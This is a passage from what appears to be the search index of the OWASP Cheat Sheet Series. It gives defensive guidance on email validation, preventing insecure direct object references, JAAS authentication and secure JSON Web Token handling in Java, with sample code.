"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#image-upload-verification","title":"Image Upload Verification","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#email-address-validation","title":"Email Address Validation","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#syntactic-validation","title":"Syntactic Validation","text":"

The format of email addresses is defined by RFC 5321, and is far more complicated than most people realise. As an example, the following are all considered to be valid email addresses:

Properly parsing email addresses for validity with regular expressions is very complicated, although there are a number of publicly available documents on regex.

The biggest caveat on this is that although the RFC defines a very flexible format for email addresses, most real world implementations (such as mail servers) use a far more restricted address format, meaning that they will reject addresses that are technically valid. Although they may be technically correct, these addresses are of little use if your application will not be able to actually send emails to them.

As such, the best way to validate email addresses is to perform some basic initial validation, and then pass the address to the mail server and catch the exception if it rejects it. This means that the application can be confident that its mail server can send emails to any addresses it accepts. The initial validation could be as simple as:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#semantic-validation","title":"Semantic Validation","text":"

Semantic validation is about determining whether the email address is correct and legitimate. The most common way to do this is to send an email to the user, and require that they click a link in the email, or enter a code that has been sent to them. This provides a basic level of assurance that:

The links that are sent to users to prove ownership should contain a token that is:

After validating the ownership of the email address, the user should then be required to authenticate on the application through the usual mechanism.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#disposable-email-addresses","title":"Disposable Email Addresses","text":"

In some cases, users may not want to give their real email address when registering on the application, and will instead provide a disposable email address. These are publicly available addresses that do not require the user to authenticate, and are typically used to reduce the amount of spam received by users' primary email addresses.

Blocking disposable email addresses is almost impossible, as there are a large number of websites offering these services, with new domains being created every day. There are a number of publicly available lists and commercial lists of known disposable domains, but these will always be incomplete.

If these lists are used to block the use of disposable email addresses then the user should be presented with a message explaining why they are blocked (although they are likely to simply search for another disposable provider rather than giving their legitimate address).

If it is essential that disposable email addresses are blocked, then registrations should only be allowed from specifically-allowed email providers. However, if this includes public providers such as Google or Yahoo, users can simply register their own disposable address with them.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#sub-addressing","title":"Sub-Addressing","text":"

Sub-addressing allows a user to specify a tag in the local part of the email address (before the @ sign), which will be ignored by the mail server. For example, if that example.org domain supports sub-addressing, then the following email addresses are equivalent:

Many mail providers (such as Microsoft Exchange) do not support sub-addressing. The most notable provider who does is Gmail, although there are many others that also do.

Some users will use a different tag for each website they register on, so that if they start receiving spam to one of the sub-addresses they can identify which website leaked or sold their email address.

Because it could allow users to register multiple accounts with a single email address, some sites may wish to block sub-addressing by stripping out everything between the + and @ signs. This is not generally recommended, as it suggests that the website owner is either unaware of sub-addressing or wishes to prevent users from identifying them when they leak or sell email addresses. Additionally, it can be trivially bypassed by using disposable email addresses, or simply registering multiple email accounts with a trusted provider.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html","title":"Insecure Direct Object Reference Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Insecure Direct Object Reference (called IDOR from here) occurs when a application exposes a reference to an internal implementation object. Using this method, an IDOR reveals the real identifier and format or pattern used of the element in the storage backend. The most common example is of a record identifier in a storage system such as a database or filesystem, though these are not the only examples.

IDOR is referenced in element A4 of the OWASP Top 10, in the 2013 edition.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

IDOR does not create a direct security issue itself because, by itself, it reveals only the format or pattern used for the object identifier. However, IDOR brings, depending on the format or pattern in place, a capacity for the attacker to mount an enumeration attack, allowing the attacker to try to probe access to the associated objects.

Enumeration attacks can be described in the way in which the attacker builds a collection of valid identifiers using the discovered format or pattern, and tests them against the application.

For example:

Imagine an HR application exposing a service accepting employee IDs in order to return employee information, and for which the format or pattern of the employee ID is the following:

EMP-00000\nEMP-00001\nEMP-00002\n...\n

Based on this, an attacker can build a collection of valid IDs from EMP-00000 to EMP-99999.

To be exploited, an IDOR issue must be combined with an Access Control issue, because it's the Access Control issue that \"allows\" the attacker to access the object for which they have guessed the identifier through the enumeration attack.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#additional-remarks","title":"Additional remarks","text":"

From Jeff Williams:

Direct Object Reference is fundamentally a Access Control problem. We split it out to emphasize the difference between URL access control and data layer access control. You can't do anything about the data-layer problems with URL access control. And they're not really input validation problems either. But we see DOR manipulation all the time. If we list only \"Messed-up from the Floor-up Access Control\" then people will probably only put in SiteMinder or JEE declarative access control on URLs and call it a day. That's what we're trying to avoid.

From Eric Sheridan:

An object reference map is first populated with a list of authorized values which are temporarily stored in the session. When the user requests a field (ex: color=654321), the application does a lookup in this map from the session to determine the appropriate column name. If the value does not exist in this limited map, the user is not authorized. Reference maps should not be global (i.e. include every possible value), they are temporary maps/dictionaries that are only ever populated with authorized values.

\"A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.\"

I'm \"down\" with DOR's for files, directories, etc. But not so much for ALL databases primary keys. That's just insane, like you are suggesting. I think that anytime database primary keys are exposed, an access control rule is required. There is no way to practically DOR all database primary keys in a real enterprise or post-enterprise system.

But, suppose a user has a list of accounts, like a bank where database ID 23456 is their checking account. I'd DOR that in a heartbeat. You need to be prudent about this.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#objective","title":"Objective","text":"

This article proposes an idea to prevent the exposure of real identifiers in a simple, portable, and stateless way because the proposal needs to handle session and session-less application topologies.

"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#proposition","title":"Proposition","text":"

The proposal uses a hash to replace the direct identifier. This hash is salted with a value defined at the application level to support topologies in which the application is deployed in multi-instance mode, such as in production environments.

Using a hash enables the following properties:

This is the implementation of the utility class that generates the the identifier to use for an exchange with the front-end:

import javax.xml.bind.DatatypeConverter;\nimport java.io.UnsupportedEncodingException;\nimport java.security.MessageDigest;\nimport java.security.NoSuchAlgorithmException;\n\n/**\n * Handle the creation of ID that will be send to front end side\n * in order to prevent IDOR\n */\n\npublic class IDORUtil {\n/**\n     * SALT used for the generation of the HASH of the real item identifier\n     * in order to prevent to forge it on front end side.\n     */\nprivate static final String SALT = \"[READ_IT_FROM_APP_CONFIGURATION]\";\n\n/**\n     * Compute a identifier that will be send to the front end and be used as item\n     * unique identifier on client side.\n     *\n     * @param realItemBackendIdentifier Identifier of the item on the backend storage\n     *                                  (real identifier)\n     * @return A string representing the identifier to use\n     * @throws UnsupportedEncodingException If string's byte cannot be obtained\n     * @throws NoSuchAlgorithmException If the hashing algorithm used is not\n     *                                  supported is not available\n     */\npublic static String computeFrontEndIdentifier(String realItemBackendIdentifier)\nthrows NoSuchAlgorithmException, UnsupportedEncodingException {\nString frontEndId = null;\nif (realItemBackendIdentifier != null && !realItemBackendIdentifier.trim().isEmpty()) {\n//Prefix the value with the SALT\nString tmp = SALT + realItemBackendIdentifier;\n//Get and configure message digester\n//We use SHA1 here for the following reason even if SHA1 have now potential collision:\n//1. We do not store sensitive information, just technical ID\n//2. We want that the ID stay short but not guessable\n//3. We want that a maximum of backend storage support the algorithm used in order to compute it in selection query/request\n//If your backend storage supports SHA256 so use it instead of SHA1\nMessageDigest digester = MessageDigest.getInstance(\"sha1\");\n//Compute the hash\nbyte[] hash = digester.digest(tmp.getBytes(\"utf-8\"));\n//Encode is in HEX\nfrontEndId = DatatypeConverter.printHexBinary(hash);\n}\nreturn frontEndId;\n}\n}\n

This is the example of services using the front identifier:

/**\n * Service to list all available movies\n *\n * @return The collection of movies ID and name as JSON response\n */\n@RequestMapping(value = \"/movies\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Map<String, String> listAllMovies() {\nMap<String, String> result = new HashMap<>();\n\ntry {\nthis.movies.forEach(m -> {\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Add the computed ID and the associated item name to the result map\nresult.put(frontEndId, m.getName());\n} catch (Exception e) {\nLOGGER.error(\"Error during ID generation for real ID {}: {}\", m.getBackendIdentifier(),\ne.getMessage());\n}\n});\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nresult.clear();\nLOGGER.error(\"Error during processing\", e);\n}\n\nreturn result;\n}\n\n/**\n * Service to obtain the information on a specific movie\n *\n * @param id Movie identifier from a front end point of view\n * @return The movie object as JSON response\n */\n@RequestMapping(value = \"/movies/{id}\", method = GET, produces = {MediaType.APPLICATION_JSON_VALUE})\npublic Movie obtainMovieName(@PathVariable(\"id\") String id) {\n\n//Search for the wanted movie information using Front End Identifier\nOptional<Movie> movie = this.movies.stream().filter(m -> {\nboolean match;\ntry {\n//Compute the front end ID for the current element\nString frontEndId = IDORUtil.computeFrontEndIdentifier(m.getBackendIdentifier());\n//Check if the computed ID match the one provided\nmatch = frontEndId.equals(id);\n} catch (Exception e) {\n//Ensure that in case of error no item is returned\nmatch = false;\nLOGGER.error(\"Error during processing\", e);\n}\nreturn match;\n}).findFirst();\n\n//We have marked the Backend Identifier class field as excluded\n//from the serialization\n//So we can send the object to front end through the serializer\nreturn movie.get();\n}\n

This is the value object used:

public class Movie {\n/**\n     * We indicate to serializer that this field must never be serialized\n     *\n     * @see \"https://fasterxml.github.io/jackson-annotations/javadoc/2.5/com/fasterxml/\n     *       jackson/annotation/JsonIgnore.html\"\n     */\n@JsonIgnore\nprivate String backendIdentifier;\n...\n}\n
"},{"location":"cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html","title":"JAAS Cheat Sheet","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#introduction-what-is-jaas-authentication","title":"Introduction - What is JAAS authentication","text":"

The process of verifying the identity of a user or another system is authentication.

JAAS, as an authentication framework manages the authenticated user's identity and credentials from login to logout.

The JAAS authentication lifecycle:

  1. Create LoginContext.
  2. Read the configuration file for one or more LoginModules to initialize.
  3. Call LoginContext.initialize() for each LoginModule to initialize.
  4. Call LoginContext.login() for each LoginModule.
  5. If login successful then call LoginContext.commit() else call LoginContext.abort()
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#configuration-file","title":"Configuration file","text":"

The JAAS configuration file contains a LoginModule stanza for each LoginModule available for logging on to the application.

A stanza from a JAAS configuration file:

Branches\n{\n    USNavy.AppLoginModule required\n    debug=true\n    succeeded=true;\n}\n

Note the placement of the semicolons, terminating both LoginModule entries and stanzas.

The word required indicates the LoginContext's login() method must be successful when logging in the user. The LoginModule-specific values debug and succeeded are passed to the LoginModule.

They are defined by the LoginModule and their usage is managed inside the LoginModule. Note, Options are Configured using key-value pairing such as debug=\"true\" and the key and value should be separated by a = sign.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#mainjava-the-client","title":"Main.java (The client)","text":"
Java \u2013Djava.security.auth.login.config==packageName/packageName.config\n        packageName.Main Stanza1\n\nWhere:\n    packageName is the directory containing the config file.\n    packageName.config specifies the config file in the Java package, packageName.\n    packageName.Main specifies Main.java in the Java package, packageName.\n    Stanza1 is the name of the stanza Main() should read from the config file.\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#loginmodulejava","title":"LoginModule.java","text":"

A LoginModule must have the following authentication methods:

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#initialize","title":"initialize()","text":"

In Main(), after the LoginContext reads the correct stanza from the config file, the LoginContext instantiates the LoginModule specified in the stanza.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#login","title":"login()","text":"

Captures user supplied login information. The code snippet below declares an array of two callback objects which, when passed to the callbackHandler.handle method in the callbackHandler.java program, will be loaded with a username and password provided interactively by the user:

NameCallback nameCB = new NameCallback(\"Username\");\nPasswordCallback passwordCB = new PasswordCallback (\"Password\", false);\nCallback[] callbacks = new Callback[] { nameCB, passwordCB };\ncallbackHandler.handle (callbacks);\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#commit","title":"commit()","text":"

Once the users credentials are successfully verified during login(), the JAAS authentication framework associates the credentials, as needed, with the subject.

There are two types of credentials, Public and Private:

Principals (i.e. Identities the subject has other than their login name) such as employee number or membership ID in a user group are added to the subject.

Below, is an example commit() method where first, for each group the authenticated user has membership in, the group name is added as a principal to the subject. The subject's username is then added to their public credentials.

Code snippet setting then adding any principals and a public credentials to a subject:

public boolean commit() {\nIf (userAuthenticated) {\nSet groups = UserService.findGroups (username);\nfor (Iterator itr = groups.iterator (); itr.hasNext (); {\nString groupName = (String) itr.next ();\nUserGroupPrincipal group = new UserGroupPrincipal (GroupName);\nsubject.getPrincipals ().add (group);\n}\nUsernameCredential cred = new UsernameCredential (username);\nsubject.getPublicCredentials().add (cred);\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#abort","title":"abort()","text":"

The abort() method is called when authentication doesn't succeed. Before the abort() method exits the LoginModule, care should be taken to reset state including the username and password input fields.

"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#logout","title":"logout()","text":"

The release of the users principals and credentials when LoginContext.logout is called:

public boolean logout() {\nif (!subject.isReadOnly()) {\nSet\u00a0principals\u00a0=\u00a0subject.getPrincipals(UserGroupPrincipal.class);\nsubject.getPrincipals().removeAll(principals);\nSet\u00a0creds\u00a0=\u00a0subject.getPublicCredentials(UsernameCredential.class);\nsubject.getPublicCredentials().removeAll(creds);\nreturn\u00a0true;\n} else {\nreturn false;\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#callbackhandlerjava","title":"CallbackHandler.java","text":"

The callbackHandler is in a source (.java) file separate from any single LoginModule so that it can service a multitude of LoginModules with differing callback objects:

public void handle(Callback[] callbacks) {\nfor (int i = 0; i < callbacks.length; i++) {\nCallback callback = callbacks[i];\nif (callback instanceof NameCallback) {\nNameCallback nameCallBack = (NameCallback) callback;\nnameCallBack.setName(username);\n}  else if (callback instanceof PasswordCallback) {\nPasswordCallback passwordCallBack = (PasswordCallback) callback;\npasswordCallBack.setPassword(password.toCharArray());\n}\n}\n}\n
"},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/JAAS_Cheat_Sheet.html#disclosure","title":"Disclosure","text":"

All of the code in the attached JAAS cheat sheet has been copied verbatim from this free source.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html","title":"JSON Web Token Cheat Sheet for Java","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Many applications use JSON Web Tokens (JWT) to allow the client to indicate its identity for further exchange after authentication.

From JWT.IO:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA.

JSON Web Token is used to carry information related to the identity and characteristics (claims) of a client. This information is signed by the server in order for it to detect whether it was tampered with after sending it to the client. This will prevent an attacker from changing the identity or any characteristics (for example, changing the role from simple user to admin or change the client login).

This token is created during authentication (is provided in case of successful authentication) and is verified by the server before any processing. It is used by an application to allow a client to present a token representing the user's \"identity card\" to the server and allow the server to verify the validity and integrity of the token in a secure way, all of this in a stateless and portable approach (portable in the way that client and server technologies can be different including also the transport channel even if HTTP is the most often used).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-structure","title":"Token Structure","text":"

Token structure example taken from JWT.IO:

[Base64(HEADER)].[Base64(PAYLOAD)].[Base64(SIGNATURE)]

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\neyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.\nTJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n

Chunk 1: Header

{\n\"alg\": \"HS256\",\n\"typ\": \"JWT\"\n}\n

Chunk 2: Payload

{\n\"sub\": \"1234567890\",\n\"name\": \"John Doe\",\n\"admin\": true\n}\n

Chunk 3: Signature

HMACSHA256( base64UrlEncode(header) + \".\" + base64UrlEncode(payload), KEY )\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheatsheet provides tips to prevent common security issues when using JSON Web Tokens (JWT) with Java.

The tips presented in this article are part of a Java project that was created to show the correct way to handle creation and validation of JSON Web Tokens.

You can find the Java project here, it uses the official JWT library.

In the rest of the article, the term token refers to the JSON Web Tokens (JWT).

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#consideration-about-using-jwt","title":"Consideration about Using JWT","text":"

Even if a JWT token is \"easy\" to use and allow to expose services (mostly REST style) in a stateless way, it's not the solution that fits for all applications because it comes with some caveats, like for example the question of the storage of the token (tackled in this cheatsheet) and others...

If your application does not need to be fully stateless, you can consider using traditional session system provided by all web frameworks and follow the advice from the dedicated session management cheat sheet. However, for stateless applications, when well implemented, it's a good candidate.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#issues","title":"Issues","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#none-hashing-algorithm","title":"None Hashing Algorithm","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom","title":"Symptom","text":"

This attack, described here, occurs when an attacker alters the token and changes the hashing algorithm to indicate, through the none keyword, that the integrity of the token has already been verified. As explained in the link above some libraries treated tokens signed with the none algorithm as a valid token with a verified signature, so an attacker can alter the token claims and the modified token will still be trusted by the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent","title":"How to Prevent","text":"

First, use a JWT library that is not exposed to this vulnerability.

Last, during token validation, explicitly request that the expected algorithm was used.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example","title":"Implementation Example","text":"
// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Create a verification context for the token requesting\n//explicitly the use of the HMAC-256 hashing algorithm\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC)).build();\n\n//Verify the token, if the verification fail then a exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-sidejacking","title":"Token Sidejacking","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

This attack occurs when a token has been intercepted/stolen by an attacker and they use it to gain access to the system using targeted user identity.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_1","title":"How to Prevent","text":"

A way to prevent it is to add a \"user context\" in the token. A user context will be composed of the following information:

IP addresses should not be used because there are some legitimate situations in which the IP address can change during the same session. For example, when an user accesses an application through their mobile device and the mobile operator changes during the exchange, then the IP address may (often) change. Moreover, using the IP address can potentially cause issues with European GDPR compliance.

During token validation, if the received token does not contain the right context (for example, if it has been replayed), then it must be rejected.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_1","title":"Implementation example","text":"

Code to create the token after successful authentication.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n// Random data generator\nprivate SecureRandom secureRandom = new SecureRandom();\n\n...\n\n//Generate a random string that will constitute the fingerprint for this user\nbyte[] randomFgp = new byte[50];\nsecureRandom.nextBytes(randomFgp);\nString userFingerprint = DatatypeConverter.printHexBinary(randomFgp);\n\n//Add the fingerprint in a hardened cookie - Add cookie manually because\n//SameSite attribute is not supported by javax.servlet.http.Cookie class\nString fingerprintCookie = \"__Secure-Fgp=\" + userFingerprint\n+ \"; SameSite=Strict; HttpOnly; Secure\";\nresponse.addHeader(\"Set-Cookie\", fingerprintCookie);\n\n//Compute a SHA256 hash of the fingerprint in order to store the\n//fingerprint hash (instead of the raw value) in the token\n//to prevent an XSS to be able to read the fingerprint and\n//set the expected cookie itself\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create the token with a validity of 15 minutes and client context (fingerprint) information\nCalendar c = Calendar.getInstance();\nDate now = c.getTime();\nc.add(Calendar.MINUTE, 15);\nDate expirationDate = c.getTime();\nMap<String, Object> headerClaims = new HashMap<>();\nheaderClaims.put(\"typ\", \"JWT\");\nString token = JWT.create().withSubject(login)\n.withExpiresAt(expirationDate)\n.withIssuer(this.issuerID)\n.withIssuedAt(now)\n.withNotBefore(now)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.withHeader(headerClaims)\n.sign(Algorithm.HMAC256(this.keyHMAC));\n

Code to validate the token.

// HMAC key - Block serialization and storage as String in JVM memory\nprivate transient byte[] keyHMAC = ...;\n\n...\n\n//Retrieve the user fingerprint from the dedicated cookie\nString userFingerprint = null;\nif (request.getCookies() != null && request.getCookies().length > 0) {\nList<Cookie> cookies = Arrays.stream(request.getCookies()).collect(Collectors.toList());\nOptional<Cookie> cookie = cookies.stream().filter(c -> \"__Secure-Fgp\"\n.equals(c.getName())).findFirst();\nif (cookie.isPresent()) {\nuserFingerprint = cookie.get().getValue();\n}\n}\n\n//Compute a SHA256 hash of the received fingerprint in cookie in order to compare\n//it to the fingerprint hash stored in the token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] userFingerprintDigest = digest.digest(userFingerprint.getBytes(\"utf-8\"));\nString userFingerprintHash = DatatypeConverter.printHexBinary(userFingerprintDigest);\n\n//Create a verification context for the token\nJWTVerifier verifier = JWT.require(Algorithm.HMAC256(keyHMAC))\n.withIssuer(issuerID)\n.withClaim(\"userFingerprint\", userFingerprintHash)\n.build();\n\n//Verify the token, if the verification fail then an exception is thrown\nDecodedJWT decodedToken = verifier.verify(token);\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in-token-revocation-by-the-user","title":"No Built-In Token Revocation by the User","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

This problem is inherent to JWT because a token only becomes invalid when it expires. The user has no built-in feature to explicitly revoke the validity of a token. This means that if it is stolen, a user cannot revoke the token itself thereby blocking the attacker.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_2","title":"How to Prevent","text":"

Since JWT tokens are stateless, There is no session maintained on the server(s) serving client requests. As such, there is no session to invalidate on the server side. A well implemented Token Sidejacking solution (as explained above) should alleviate the need for maintaining block list on server side. This is because a hardened cookie used in the Token Sidejacking can be considered as secure as a session ID used in the traditional session system, and unless both the cookie and the JWT token are intercepted/stolen, the JWT is unusable. A logout can thus be 'simulated' by clearing the JWT from session storage. If the user chooses to close the browser instead, then both the cookie and sessionStorage are cleared automatically.

Another way to protect against this is to implement a token block list that will be used to mimic the \"logout\" feature that exists with traditional session management system.

The block list will keep a digest (SHA-256 encoded in HEX) of the token with a revocation date. This entry must endure at least until the expiration of the token.

When the user wants to \"logout\" then it call a dedicated service that will add the provided user token to the block list resulting in an immediate invalidation of the token for further usage in the application.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_2","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#block-list-storage","title":"Block List Storage","text":"

A database table with the following structure will be used as the central block list storage.

create table if not exists revoked_token(jwt_token_digest varchar(255) primary key,\nrevocation_date timestamp default now());\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-revocation-management","title":"Token Revocation Management","text":"

Code in charge of adding a token to the block list and checking if a token is revoked.

/**\n* Handle the revocation of the token (logout).\n* Use a DB in order to allow multiple instances to check for revoked token\n* and allow cleanup at centralized DB level.\n*/\npublic class TokenRevoker {\n\n/** DB Connection */\n@Resource(\"jdbc/storeDS\")\nprivate DataSource storeDS;\n\n/**\n  * Verify if a digest encoded in HEX of the ciphered token is present\n  * in the revocation table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @return Presence flag\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic boolean isTokenRevoked(String jwtInHex) throws Exception {\nboolean tokenIsPresent = false;\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Search token digest in HEX in DB\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"select jwt_token_digest from revoked_token where jwt_token_digest = ?\";\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ntry (ResultSet rSet = pStatement.executeQuery()) {\ntokenIsPresent = rSet.next();\n}\n}\n}\n}\n\nreturn tokenIsPresent;\n}\n\n\n/**\n  * Add a digest encoded in HEX of the ciphered token to the revocation token table\n  *\n  * @param jwtInHex Token encoded in HEX\n  * @throws Exception If any issue occur during communication with DB\n  */\npublic void revokeToken(String jwtInHex) throws Exception {\nif (jwtInHex != null && !jwtInHex.trim().isEmpty()) {\n//Decode the ciphered token\nbyte[] cipheredToken = DatatypeConverter.parseHexBinary(jwtInHex);\n\n//Compute a SHA256 of the ciphered token\nMessageDigest digest = MessageDigest.getInstance(\"SHA-256\");\nbyte[] cipheredTokenDigest = digest.digest(cipheredToken);\nString jwtTokenDigestInHex = DatatypeConverter.printHexBinary(cipheredTokenDigest);\n\n//Check if the token digest in HEX is already in the DB and add it if it is absent\nif (!this.isTokenRevoked(jwtInHex)) {\ntry (Connection con = this.storeDS.getConnection()) {\nString query = \"insert into revoked_token(jwt_token_digest) values(?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, jwtTokenDigestInHex);\ninsertedRecordCount = pStatement.executeUpdate();\n}\nif (insertedRecordCount != 1) {\nthrow new IllegalStateException(\"Number of inserted record is invalid,\" +\n\" 1 expected but is \" + insertedRecordCount);\n}\n}\n}\n\n}\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-information-disclosure","title":"Token Information Disclosure","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

This attack occurs when an attacker has access to a token (or a set of tokens) and extracts information stored in it (the contents of JWT tokens are base64 encoded, but is not encrypted by default) in order to obtain information about the system. Information can be for example the security roles, login format...

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_3","title":"How to Prevent","text":"

A way to protect against this attack is to cipher the token using, for example, a symmetric algorithm.

It's also important to protect the ciphered data against attack like Padding Oracle or any other attack using cryptanalysis.

In order to achieve all these goals, the AES-GCM algorithm is used which provides Authenticated Encryption with Associated Data.

More details from here:

AEAD primitive (Authenticated Encryption with Associated Data) provides functionality of symmetric\nauthenticated encryption.\n\nImplementations of this primitive are secure against adaptive chosen ciphertext attacks.\n\nWhen encrypting a plaintext one can optionally provide associated data that should be authenticated\nbut not encrypted.\n\nThat is, the encryption with associated data ensures authenticity (ie. who the sender is) and\nintegrity (ie. data has not been tampered with) of that data, but not its secrecy.\n\nSee RFC5116: https://tools.ietf.org/html/rfc5116\n

Note:

Here ciphering is added mainly to hide internal information but it's very important to remember that the first protection against tampering of the JWT token is the signature. So, the token signature and its verification must be always in place.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_3","title":"Implementation Example","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-ciphering","title":"Token Ciphering","text":"

Code in charge of managing the ciphering. Google Tink dedicated crypto library is used to handle ciphering operations in order to use built-in best practices provided by this library.

/**\n * Handle ciphering and deciphering of the token using AES-GCM.\n *\n * @see \"https://github.com/google/tink/blob/master/docs/JAVA-HOWTO.md\"\n */\npublic class TokenCipher {\n\n/**\n     * Constructor - Register AEAD configuration\n     *\n     * @throws Exception If any issue occur during AEAD configuration registration\n     */\npublic TokenCipher() throws Exception {\nAeadConfig.register();\n}\n\n/**\n     * Cipher a JWT\n     *\n     * @param jwt          Token to cipher\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The ciphered version of the token encoded in HEX\n     * @throws Exception If any issue occur during token ciphering operation\n     */\npublic String cipherToken(String jwt, KeysetHandle keysetHandle) throws Exception {\n//Verify parameters\nif (jwt == null || jwt.isEmpty() || keysetHandle == null) {\nthrow new IllegalArgumentException(\"Both parameters must be specified!\");\n}\n\n//Get the primitive\nAead aead = AeadFactory.getPrimitive(keysetHandle);\n\n//Cipher the token\nbyte[] cipheredToken = aead.encrypt(jwt.getBytes(), null);\n\nreturn DatatypeConverter.printHexBinary(cipheredToken);\n}\n\n/**\n     * Decipher a JWT\n     *\n     * @param jwtInHex     Token to decipher encoded in HEX\n     * @param keysetHandle Pointer to the keyset handle\n     * @return The token in clear text\n     * @throws Exception If any issue occur during token deciphering operation\n     */\npublic String decipherToken(String jwtInHex, KeysetHandle 